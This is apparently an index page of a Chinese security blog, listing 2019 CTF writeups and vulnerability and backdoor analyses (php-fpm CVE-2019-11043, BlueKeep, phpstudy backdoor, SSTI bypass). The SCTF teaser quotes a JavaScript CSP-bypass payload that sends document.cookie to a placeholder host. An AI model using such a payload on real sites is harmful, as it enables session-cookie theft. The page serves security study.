2019红帽杯 writeup

可以rce，在博客上找到的⼀条5.2.0的链，phar反序列化，上传phar.xml(改后缀)，然后xxe⽤

php-fpm Remote Code Execution 分析(CVE-2019-11043)

国外安全研究员 Andrew Danau发现向服务器请求的URL中包含%0a 符号时，服务返回异常，疑似存在漏洞。

【翻译】看我如何利用PHP的0day黑掉Pornhub并获得2W美刀奖励

在分析了Pornhub使用的平台之后，我们在其网站上检测到了unserialize函数的使用，其中的很多功能点（例如上传图片的地方等等）都受到了影响，例如下面两...

SUCTF2019-GuessGame详解

之前参加了2019 SUCTF，遇见了一道MISC题，看源码和phithon师傅的文章去了解它的opcodes，但是最终还是没做出来，因为文档实在是太少了，所以...

国际数字经济博览会安全大赛-Aliyun&Qcloud详细writeup

这次跟着Venom的师傅们一起参加了国际数字经济博览会的线下赛，谢谢师傅们带躺到第三hhh，CTF解题赛的三道云安全的题目感觉还挺经典的，拿了其中一道Aliyu...

TeamViewer攻陷疑云

TeamViewer是一个可用于Microsoft Windows、macOS、Linux、Chrome OS、iOS、Android、Windows RT、W...

SSTI Bypass 分析

护网杯过去不久，realworld到来之前先来研究研究SSTI的Bypass套路。

“送给最好的TA.apk”简单逆向分析

20190927收到一个apk，名字叫“送给最好的TA.apk”。文件哈希值如下：

phpstudy后门文件分析以及检测脚本

2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件，基于研究的目的，于是有了以下这文。

"数字经济"云安全公测大赛 WriteUp

Java 和 python 的 RSA 私钥加密略有不同，所以不浪费时间，直接从 apk 里抠出来加密部分，注意需要处理一下 base64 部分

CVE-2019-0708微软RDP远程代码执行漏洞复现

BlueKeep（CVE-2019-0708）是微软远程桌面协议（RDP）实现中发现的一个安全漏洞，它允许远程执行代码。

virink的web题

这里发现服务器是用OpenResty服务器，这里pcat科普下：OpenResty是一个基于Nginx与Lua的高性能Web平台，其内部集成了大量精良的Lua库...

SUCTF-WriteUp(上)

https://gist.github.com/ed22c1ad2dc22c56f266a92635a9591c#file-str_or_str-php

SUCTF-WriteUp(下)

而后就有了几次任意地址读且栈溢的机会，因此直接在任意地址读时读取伪造CPPEH_RECORD需要的其他信息(cookie等)

网络与信息安全领域专赛-WriteUp

gamectf.com. 600 IN TXT "flag{welcome_TXT}"

De1CTF 2019-WriteUp-PWN

De1CTF 2019-WriteUp

外层部分和 N1CTF-2018 easy_harder_php 完全一样，参考：

SCTF WriteUp

使用跳转方式绕过 CSP: location.href=`//xxx.xxx.xxx.xxx/?${document.cookie}`

Defcon China 1.0 胸卡破解笔记

不会IOT, 不会逆向, 也没去听破解胸卡的 workshop, 本菜鸡在 @hook 师傅指引下完成了这次”破解“，在此记录一下，供大家看个热闹。

RCTF WriteUp(Web篇+PWN篇)

解题思路 给了一个GET形式的一句话，查看phpinfo有open_basedir限制，利用glob:///*绕过